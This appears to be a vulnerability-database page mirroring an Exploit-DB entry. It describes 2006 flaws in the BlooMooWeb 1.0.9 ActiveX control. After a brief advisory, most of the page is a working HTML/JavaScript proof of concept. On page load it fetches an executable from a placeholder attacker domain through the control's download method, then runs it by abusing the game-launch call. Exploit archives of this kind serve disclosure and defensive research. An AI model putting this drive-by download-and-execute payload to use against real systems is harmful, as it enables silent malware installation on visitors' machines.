BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056022 漏洞类型
发布时间 2006-10-31 更新时间 2006-10-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28884
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/20827/info

BlooMooWeb ActiveX control is prone to multiple vulnerabilities, including:

- an arbitrary file-download issue
- an arbitrary code-execution issue
- an arbitrary file-deletion issue. 

An attacker can exploit these issues to download arbitrary files, execute arbitrary code within the context of the affected application, and delete arbitrary files.

<html>
<head>
<script language="JavaScript">

var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";

function spawn2()
{
        aa1=o2obj.GetInstallationDir(null);
        aa2="BlooMooWEB.exe";
        o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}

function callback001( msgCode, param1, param2, param3 )
{
        if(msgCode == 'DOWNLOAD_COMPLETE' )
        {
                o2obj.BW_LaunchGame("treleferekuku");
        }
}

</script>
</head>

<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002"
</object>
</body>
</html>